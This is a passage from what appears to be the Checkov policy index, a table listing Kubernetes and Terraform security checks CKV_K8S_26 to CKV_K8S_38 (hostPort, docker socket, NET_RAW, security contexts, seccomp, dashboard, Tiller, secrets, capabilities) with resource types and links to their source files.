Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | -| 2702 | CKV_K8S_26 | resource | kubernetes_deployment_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | -| 2703 | CKV_K8S_26 | resource | kubernetes_pod | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | -| 2704 | CKV_K8S_26 | resource | kubernetes_pod_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | -| 2705 | CKV_K8S_27 | resource | CronJob | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2706 | CKV_K8S_27 | resource | DaemonSet | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2707 | CKV_K8S_27 | resource | Deployment | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2708 | CKV_K8S_27 | resource | Job | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2709 | CKV_K8S_27 | resource | Pod | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2710 | CKV_K8S_27 | resource | ReplicaSet | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2711 | CKV_K8S_27 | resource | ReplicationController | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2712 | CKV_K8S_27 | resource | StatefulSet | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2713 | CKV_K8S_27 | resource | kubernetes_daemon_set_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2714 | CKV_K8S_27 | resource | kubernetes_daemonset | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2715 | CKV_K8S_27 | resource | kubernetes_deployment | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2716 | CKV_K8S_27 | resource | kubernetes_deployment_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2717 | CKV_K8S_27 | resource | kubernetes_pod | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2718 | CKV_K8S_27 | resource | kubernetes_pod_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2719 | CKV_K8S_28 | resource | CronJob | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2720 | CKV_K8S_28 | resource | DaemonSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2721 | CKV_K8S_28 | resource | Deployment | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2722 | CKV_K8S_28 | resource | DeploymentConfig | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2723 | CKV_K8S_28 | resource | Job | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2724 | CKV_K8S_28 | resource | Pod | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2725 | CKV_K8S_28 | resource | PodTemplate | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2726 | CKV_K8S_28 | resource | ReplicaSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2727 | CKV_K8S_28 | resource | ReplicationController | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2728 | CKV_K8S_28 | resource | StatefulSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2729 | CKV_K8S_28 | resource | kubernetes_deployment | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | -| 2730 | CKV_K8S_28 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | -| 2731 | CKV_K8S_28 | resource | kubernetes_pod | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | -| 2732 | CKV_K8S_28 | resource | kubernetes_pod_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | -| 2733 | CKV_K8S_29 | resource | CronJob | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | -| 2734 | CKV_K8S_29 | resource | DaemonSet | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | -| 2735 | CKV_K8S_29 | resource | Deployment | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | -| 2736 | CKV_K8S_29 | resource | Job | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | -| 2737 | CKV_K8S_29 | resource | Pod | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | -| 2738 | CKV_K8S_29 | resource | ReplicaSet | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | -| 2739 | CKV_K8S_29 | resource | ReplicationController | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | -| 2740 | CKV_K8S_29 | resource | StatefulSet | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | -| 2741 | CKV_K8S_29 | resource | kubernetes_daemon_set_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 2742 | CKV_K8S_29 | resource | kubernetes_daemonset | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 2743 | CKV_K8S_29 | resource | kubernetes_deployment | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 2744 | CKV_K8S_29 | resource | kubernetes_deployment_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 2745 | CKV_K8S_29 | resource | kubernetes_pod | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 2746 | CKV_K8S_29 | resource | kubernetes_pod_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 2747 | CKV_K8S_30 | resource | CronJob | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2748 | CKV_K8S_30 | resource | DaemonSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2749 | CKV_K8S_30 | resource | Deployment | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2750 | CKV_K8S_30 | resource | DeploymentConfig | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2751 | CKV_K8S_30 | resource | Job | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2752 | CKV_K8S_30 | resource | Pod | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2753 | CKV_K8S_30 | resource | PodTemplate | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2754 | CKV_K8S_30 | resource | ReplicaSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2755 | CKV_K8S_30 | resource | ReplicationController | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2756 | CKV_K8S_30 | resource | StatefulSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2757 | CKV_K8S_30 | resource | kubernetes_deployment | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | -| 2758 | CKV_K8S_30 | resource | kubernetes_deployment_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | -| 2759 | CKV_K8S_30 | resource | kubernetes_pod | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | -| 2760 | CKV_K8S_30 | resource | kubernetes_pod_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | -| 2761 | CKV_K8S_31 | resource | CronJob | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | -| 2762 | CKV_K8S_31 | resource | DaemonSet | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | -| 2763 | CKV_K8S_31 | resource | Deployment | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | -| 2764 | CKV_K8S_31 | resource | Job | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | -| 2765 | CKV_K8S_31 | resource | Pod | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | -| 2766 | CKV_K8S_31 | resource | ReplicaSet | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | -| 2767 | CKV_K8S_31 | resource | ReplicationController | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | -| 2768 | CKV_K8S_31 | resource | StatefulSet | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | -| 2769 | CKV_K8S_32 | resource | PodSecurityPolicy | Ensure default seccomp profile set to docker/default or runtime/default | Kubernetes | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SeccompPSP.py) | -| 2770 | CKV_K8S_32 | resource | kubernetes_pod_security_policy | Ensure default seccomp profile set to docker/default or runtime/default | Terraform | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SeccompPSP.py) | -| 2771 | CKV_K8S_33 | resource | CronJob | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2772 | CKV_K8S_33 | resource | DaemonSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2773 | CKV_K8S_33 | resource | Deployment | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2774 | CKV_K8S_33 | resource | DeploymentConfig | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2775 | CKV_K8S_33 | resource | Job | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2776 | CKV_K8S_33 | resource | Pod | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2777 | CKV_K8S_33 | resource | PodTemplate | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2778 | CKV_K8S_33 | resource | ReplicaSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2779 | CKV_K8S_33 | resource | ReplicationController | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2780 | CKV_K8S_33 | resource | StatefulSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2781 | CKV_K8S_34 | resource | CronJob | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2782 | CKV_K8S_34 | resource | DaemonSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2783 | CKV_K8S_34 | resource | Deployment | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2784 | CKV_K8S_34 | resource | DeploymentConfig | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2785 | CKV_K8S_34 | resource | Job | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2786 | CKV_K8S_34 | resource | Pod | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2787 | CKV_K8S_34 | resource | PodTemplate | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2788 | CKV_K8S_34 | resource | ReplicaSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2789 | CKV_K8S_34 | resource | ReplicationController | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2790 | CKV_K8S_34 | resource | StatefulSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2791 | CKV_K8S_34 | resource | kubernetes_deployment | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | -| 2792 | CKV_K8S_34 | resource | kubernetes_deployment_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | -| 2793 | CKV_K8S_34 | resource | kubernetes_pod | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | -| 2794 | CKV_K8S_34 | resource | kubernetes_pod_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | -| 2795 | CKV_K8S_35 | resource | CronJob | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2796 | CKV_K8S_35 | resource | DaemonSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2797 | CKV_K8S_35 | resource | Deployment | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2798 | CKV_K8S_35 | resource | DeploymentConfig | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2799 | CKV_K8S_35 | resource | Job | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2800 | CKV_K8S_35 | resource | Pod | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2801 | CKV_K8S_35 | resource | PodTemplate | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2802 | CKV_K8S_35 | resource | ReplicaSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2803 | CKV_K8S_35 | resource | ReplicationController | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2804 | CKV_K8S_35 | resource | StatefulSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2805 | CKV_K8S_35 | resource | kubernetes_deployment | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | -| 2806 | CKV_K8S_35 | resource | kubernetes_deployment_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | -| 2807 | CKV_K8S_35 | resource | kubernetes_pod | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | -| 2808 | CKV_K8S_35 | resource | kubernetes_pod_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | -| 2809 | CKV_K8S_36 | resource | PodSecurityPolicy | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilitiesPSP.py) | -| 2810 | CKV_K8S_36 | resource | kubernetes_pod_security_policy | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py) | -| 2811 | CKV_K8S_37 | resource | CronJob | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2812 | CKV_K8S_37 | resource | DaemonSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2813 | CKV_K8S_37 | resource | Deployment | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2814 | CKV_K8S_37 | resource | DeploymentConfig | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2815 | CKV_K8S_37 | resource | Job | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2816 | CKV_K8S_37 | resource | Pod | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2817 | CKV_K8S_37 | resource | PodTemplate | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2818 | CKV_K8S_37 | resource | ReplicaSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2819 | CKV_K8S_37 | resource | ReplicationController | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2820 | CKV_K8S_37 | resource | StatefulSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2821 | CKV_K8S_37 | resource | kubernetes_deployment | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | -| 2822 | CKV_K8S_37 | resource | kubernetes_deployment_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | -| 2823 | CKV_K8S_37 | resource | kubernetes_pod | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | -| 2824 | CKV_K8S_37 | resource | kubernetes_pod_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | -| 2825 | CKV_K8S_38 | resource | CronJob | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | -| 2826 | CKV_K8S_38 